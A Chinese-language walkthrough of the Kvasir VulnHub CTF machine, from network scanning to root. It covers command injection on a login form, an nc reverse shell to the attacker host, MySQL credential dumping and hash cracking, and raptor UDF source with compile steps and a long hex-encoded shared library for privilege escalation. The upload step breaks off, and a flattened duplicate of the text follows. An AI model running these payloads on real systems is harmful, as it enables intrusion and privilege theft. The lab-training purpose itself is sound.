Kvasir-CTF靶机实战
字数 707 2025-08-15 21:31:25

Kvasir-CTF靶机实战教学文档

靶机概述

Kvasir是一个多层次的CTF靶机,包含多个网络段和多种漏洞利用技术。本教学文档将详细讲解从信息收集到最终获取root权限的完整渗透过程。

环境准备

  1. 下载靶机:https://download.vulnhub.com/kvasir/kvasir1.tar
  2. 解压后导入虚拟机环境
  3. 确保攻击机(Kali Linux)与靶机在同一网络

渗透测试流程

1. 信息收集

1.1 发现靶机IP

使用nmap扫描网络:

nmap -sn 192.168.0.0/24

1.2 端口扫描

nmap -p- -A 192.168.0.104

发现仅开放80端口

2. Web应用渗透

2.1 访问Web服务

浏览器访问:http://192.168.0.104

2.2 SQL注入测试

  1. 发现输入框,尝试SQL注入
  2. 使用sqlmap进行自动化测试:
sqlmap -u "http://192.168.0.104/search.php?query=test" --batch

但返回403错误

2.3 目录扫描

使用dirb或gobuster:

gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/dirb/common.txt

发现login.php

2.4 绕过302跳转

使用Burp Suite拦截响应,修改状态码为200,显示登录页面

3. 命令注入漏洞利用

3.1 发现命令注入

在登录表单中发现命令注入漏洞

3.2 反弹Shell

使用nc反弹shell:

apache2; nc -e /bin/sh 192.168.0.106 4444

4. 数据库渗透

4.1 查看数据库配置

查看login.php源代码,发现数据库连接信息:

mysql_connect("192.168.2.200", "webapp", "webapp")

4.2 数据库操作

  1. 查看授权:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'show grants;'
  1. 查看数据表:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; show tables;'
  1. 获取用户哈希:
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use mysql; select DISTINCT User,Password from user;'

4.3 破解密码

使用John the Ripper破解MySQL root密码:

john --wordlist=/usr/share/wordlists/rockyou.txt mysql_hash.txt

得到密码:coolwater

5. MySQL UDF提权

5.1 编译恶意库

创建raptor.c:

#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
    unsigned int arg_count;
    enum Item_result *arg_type;
    char **args;
    unsigned long *lengths;
    char *maybe_null;
} UDF_ARGS;
typedef struct st_udf_init {
    char maybe_null;
    unsigned int decimals;
    unsigned long max_length;
    char *ptr;
    char const_item;
} UDF_INIT;
int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error){
    if (args->arg_count != 1)
        return(0);
    system(args->args[0]);
    return(0);
}
char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message){
    return(0);
}

编译:

gcc -fPIC -g -c raptor.c
gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc

5.2 上传恶意库

将so文件编码为十六进制:

xxd -p -c `stat --format="%s" raptor.so` raptor.so

通过MySQL上传:

SELECT x'7f454c4602010100000000000000000003003e000100000050100000000000004000000000000000584200000000000000000000400038000900400020001f000100000004000000000000000000000000000000000000000000000000000000c804000000000000c804000000000000001000000000000001000000050000000010000000000000001000000000000000100000000000006901000000000000690100000000000000100000000000000100000004000000002000000000000000200000000000000020000000000000cc00000000000000cc0000000000000000100000000000000100000006000000002e000000000000003e000000000000003e0000000000002802000000000000300200000000000000100000000000000200000006000000102e000000000000103e000000000000103e000000000000d001000000000000d0010000000000000800000000000000040000000400000038020000000000003802000000000000380200000000000024000000000000002400000000000000040000000000000050e57464040000000020000000000000002000000000000000200000000000002c000000000000002c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000002e000000000000003e000000000000003e000000000000000200000000000000020000000000000100000000000000040000001400000003000000474e55005e9d8663bf7886522a23711229527f095019b37a0000000002000000060000000100000006000000000000400008005006000000070000009f0f9b122b4f31f90000000000000000000000000000000000000000000000001000000020000000000000000000000000000000000000005c00000012000000000000000000000000000000000000000100000020000000000000000000000000000000000000002c00000020000000000000000000000000000000000000004600000022000000000000000000000000000000000000006300000012000c00491100000000000017000000000000005500000012000c0005110000000000004400000000000000005f5f676d6f6e5f73746172745f5f005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a6500646f5f636d640073797374656d00646f5f636d645f696e6974006c6962632e736f2e3600726170746f722e736f00474c4942435f322e322e35000000000000020000000000020001000100010001006f0000001000000000000000751a6909000002008300000000000000003e00000000000008000000000000000011000000000000083e0000000000000800000000000000c010000000000000204000000000000008000000000000002040000000000000e03f00000000000006000000010000000000000000000000e83f00000000000006000000030000000000000000000000f03f00000000000006000000040000000000000000000000f83f000000000000060000000500000000000000000000001840000000000000070000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Kvasir-CTF靶机实战教学文档 靶机概述 Kvasir是一个多层次的CTF靶机,包含多个网络段和多种漏洞利用技术。本教学文档将详细讲解从信息收集到最终获取root权限的完整渗透过程。 环境准备 下载靶机:https://download.vulnhub.com/kvasir/kvasir1.tar 解压后导入虚拟机环境 确保攻击机(Kali Linux)与靶机在同一网络 渗透测试流程 1. 信息收集 1.1 发现靶机IP 使用nmap扫描网络: 1.2 端口扫描 发现仅开放80端口 2. Web应用渗透 2.1 访问Web服务 浏览器访问:http://192.168.0.104 2.2 SQL注入测试 发现输入框,尝试SQL注入 使用sqlmap进行自动化测试: 但返回403错误 2.3 目录扫描 使用dirb或gobuster: 发现login.php 2.4 绕过302跳转 使用Burp Suite拦截响应,修改状态码为200,显示登录页面 3. 命令注入漏洞利用 3.1 发现命令注入 在登录表单中发现命令注入漏洞 3.2 反弹Shell 使用nc反弹shell: 4. 数据库渗透 4.1 查看数据库配置 查看login.php源代码,发现数据库连接信息: 4.2 数据库操作 查看授权: 查看数据表: 获取用户哈希: 4.3 破解密码 使用John the Ripper破解MySQL root密码: 得到密码:coolwater 5. MySQL UDF提权 5.1 编译恶意库 创建raptor.c: 编译: 5.2 上传恶意库 将so文件编码为十六进制: 通过MySQL上传: